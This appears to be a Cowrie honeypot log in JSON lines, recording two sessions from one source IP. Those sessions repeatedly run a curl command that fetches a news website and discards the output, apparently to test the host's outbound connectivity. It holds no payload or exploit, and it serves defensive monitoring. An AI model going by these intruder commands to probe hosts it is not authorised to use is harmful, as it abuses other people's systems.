{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.272180Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.276051Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.277168Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.280527Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.281773Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.299691Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.320226Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.328065Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.329396Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.334221Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.335239Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.339137Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.363055Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.379957Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.381320Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.384073Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.386199Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.387541Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.404621Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.422690Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.425643Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.426709Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.429480Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.430505Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.452395Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.454025Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.469954Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.470973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.473864Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.474709Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.498546Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.500917Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.539413Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.540939Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.575746Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.576874Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.579551Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.580588Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.582852Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.584743Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.611397Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.612469Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.623419Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.624401Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.629519Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.646944Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.658091Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.659013Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.670592Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.671443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.690269Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.692704Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.694872Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.695776Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.713013Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.713983Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.731071Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.734417Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.735408Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.749109Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.757515Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.758486Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.771795Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.785147Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.786179Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.803007Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.804097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.828583Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.829726Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.835847Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.837037Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.851229Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.852145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.899550Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.900693Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:15.939279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.940344Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.968900Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:15.970291Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.006152Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.007305Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.042817Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.043893Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.071115Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.072533Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.078075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.078989Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.155011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.156071Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.157889Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.159615Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.188555Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.189732Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.196884Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.199247Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.208899Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.209957Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.234776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.235913Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.238483Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.239924Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.251732Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.252717Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.276612Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.277544Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.284108Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.285105Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.297058Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.298059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.316475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.317678Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.335135Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.336137Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.359556Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.360583Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.374053Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.375028Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","shasum":"f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.383271Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4 to var/lib/cowrie/downloads/f98b95e1968cf3cda9ebfdf6273d555663f51dfa8258c7b62c03e890050ba6d4","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.391015Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.393129Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.405058Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.406145Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.414279Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.415300Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.446202Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download.failed","url":"http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:31:16.447822Z","message":"Attempt to download file(s) from URL (http://m.news.cn/) failed","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:31:16.454754Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
